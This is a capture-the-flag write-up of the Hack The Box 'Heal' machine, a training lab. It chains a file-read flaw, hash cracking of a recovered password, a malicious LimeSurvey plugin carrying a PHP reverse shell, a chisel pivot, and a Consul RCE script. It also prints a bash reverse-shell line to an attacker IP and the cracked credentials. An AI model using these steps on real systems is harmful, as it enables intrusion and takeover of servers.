> m4rt@CTF_ARCHIVE:~$

Hack The Box / LINUX / 2024-12-28

Hack The Box — Heal (Linux)

LFI in resume download exposes internal Rails artifacts and credentials, admin access to LimeSurvey enables plugin-based RCE, and internal Consul exploitation through chisel pivot yields root.

Target

  • IP: 10.129.13.193

Port Scan

sudo nmap -sC -sV 10.129.13.193 -p- -T5 -v

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 68:af:80:86:6e:61:7e:bf:0b:ea:10:52:d7:7a:94:3d (ECDSA)
|_  256 52:f4:8d:f1:c7:85:b6:6f:c6:5f:b2:db:a6:17:68:ae (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://heal.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Registration Flow and API Host Discovery

Add heal.htb to /etc/hosts. Go to http://heal.htb. Open developer tools and go to the Network tab. Register a user. It says Something went wrong. We see a request to http://api.heal.htb/signup. Add api.heal.htb to /etc/hosts. Now we can register a user. Go to the profile page. We notice:

ID: 2
Admin: No

Resume Export LFI

Fill out the form to generate a resume. Intercept the request with Burp. We see a POST request to /exports and a GET request to /download?filename=e6a25bc0b5d98150137d.pdf. Send the download request to Repeater. Modify it to:

/download?filename=/etc/passwd

We obtain the passwd file. So there is an LFI. We notice users ron and ralph.

From response headers we notice nginx is used.

Click the website survey button, then Take The Survey. We are redirected to http://take-survey.heal.htb/index.php/552933?lang=en. Add it to /etc/hosts. Complete the form. Intercept the request with Burp and send it to Repeater. If we send the request twice, the second time we get an error, and it says:

For further information please contact Administrator:
ralph@heal.htb

Go to http://take-survey.heal.htb/index.php/. We notice this is LimeSurvey.

Go back to the Burp Repeater tab with the LFI. Set:

/download?filename=/etc/nginx/sites-available/heal.htb

We obtain the file. We note:

# Proxy requests to the Flask server
    location / {
        limit_req zone=mylimit burst=20;
        proxy_pass http://localhost:3000;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }

Now set:

/download?filename=/etc/nginx/sites-available/api.heal.htb

We note:

# Proxy requests to the Flask server
    location / {
        limit_req zone=mylimit burst=20;
        proxy_pass http://localhost:3001;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }

Rails App Discovery via /proc/self/cwd

/download?filename=/proc/self/cwd/.git/HEAD

We discover it is a Git repository.

/download?filename=/proc/self/cwd/.gitignore

We discover it is a Ruby web application.

/download?filename=/proc/self/cwd/config.ru

We discover it is a Rails application.

/download?filename=/proc/self/cwd/config/database.yml

We note:

development:
  <<: *default
  database: storage/development.sqlite3

production:
  <<: *default
  database: storage/development.sqlite3

SQLite Extraction and Hash Cracking

/download?filename=/proc/self/cwd/storage/development.sqlite3

In Burp, right-click and choose Copy to file. Remove the first lines.

sqlite3 developmemt.sqlite3
.tables

We notice the users table.

select * from users;

1|ralph@heal.htb|$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG|2024-09-27 07:49:31.614858|2024-09-27 07:49:31.614858|Administrator|ralph|1

Copy the hash into a file named hash.

hashcat -a 0 -m 3200 ./hash ./rockyou.txt

We obtain password: 147258369. If we try to log in with SSH, it does not work.

LimeSurvey RCE via malicious plugin upload

Go back to LimeSurvey. Go to http://take-survey.heal.htb/admin. We are redirected to http://take-survey.heal.htb/index.php/admin/authentication/sa/login. Log in with credentials:

  • username: ralph@heal.htb

  • password: 147258369

We discover this is LimeSurvey version 6.6.4. Useful sites:

  • https://ine.com/blog/cve-2021-44967-limesurvey-rce

  • https://github.com/Y1LD1R1M-1337/Limesurvey-RCE

nc -vlnp 4444
git clone https://github.com/Y1LD1R1M-1337/Limesurvey-RCE.git
cd Limesurvey-RCE
cp /usr/share/webshells/php/php-reverse-shell.php .

Set your IP and port in php-reverse-shell.php. In config.xml, under compatibility, set:

<version>6.0</version>

zip plugin.zip config.xml php-reverse-shell.php

Go to http://take-survey.heal.htb/index.php/admin/pluginmanager. Click Upload and install. Upload plugin.zip. In the plugin list, on plugin Y1LD1R1M, click the three dots and then Activate. Go to http://take-survey.heal.htb/upload/plugins/Y1LD1R1M/php-reverse-shell.php. We get a reverse shell.

Internal Service Enumeration

ss -ltpn

LISTEN 0      511          0.0.0.0:80        0.0.0.0:*    users:(("nginx",pid=1010,fd=6),("nginx",pid=1008,fd=6))
LISTEN 0      244        127.0.0.1:5432      0.0.0.0:*
LISTEN 0      128          0.0.0.0:22        0.0.0.0:*
LISTEN 0      4096       127.0.0.1:8600      0.0.0.0:*
LISTEN 0      4096   127.0.0.53%lo:53        0.0.0.0:*
LISTEN 0      4096       127.0.0.1:8500      0.0.0.0:*
LISTEN 0      4096       127.0.0.1:8503      0.0.0.0:*
LISTEN 0      4096       127.0.0.1:8300      0.0.0.0:*
LISTEN 0      4096       127.0.0.1:8301      0.0.0.0:*
LISTEN 0      4096       127.0.0.1:8302      0.0.0.0:*
LISTEN 0      511        127.0.0.1:3000      0.0.0.0:*
LISTEN 0      1024       127.0.0.1:3001      0.0.0.0:*
LISTEN 0      128             [::]:22           [::]:*

Pivot to Consul With Chisel

Download chisel (https://github.com/jpillora/chisel) and upload it to the target machine.

On the attacker machine:

./chisel server --port 8000 --reverse

On the target machine:

./chisel client http://10.10.16.12:8000 R:127.0.0.1:8500:127.0.0.1:8500

Go to http://localhost:8500/. It is HashiCorp Consul version 1.19.2. There is an exploit: https://github.com/owalid/consul-rce

Consul RCE for Root Access

git clone https://github.com/owalid/consul-rce.git

Listen:

nc -vlnp 4444

On the target machine create /dev/shm/rev with content:

#!/bin/bash
bash -i >& /dev/tcp/10.10.16.12/4444 0>&1

Make it executable and readable by everyone:

chmod 777 /dev/shm/rev

python3 consul-rce/consul_rce.py -th 127.0.0.1 -tp 8500 -c "/dev/shm/rev"

We get a reverse shell as user root.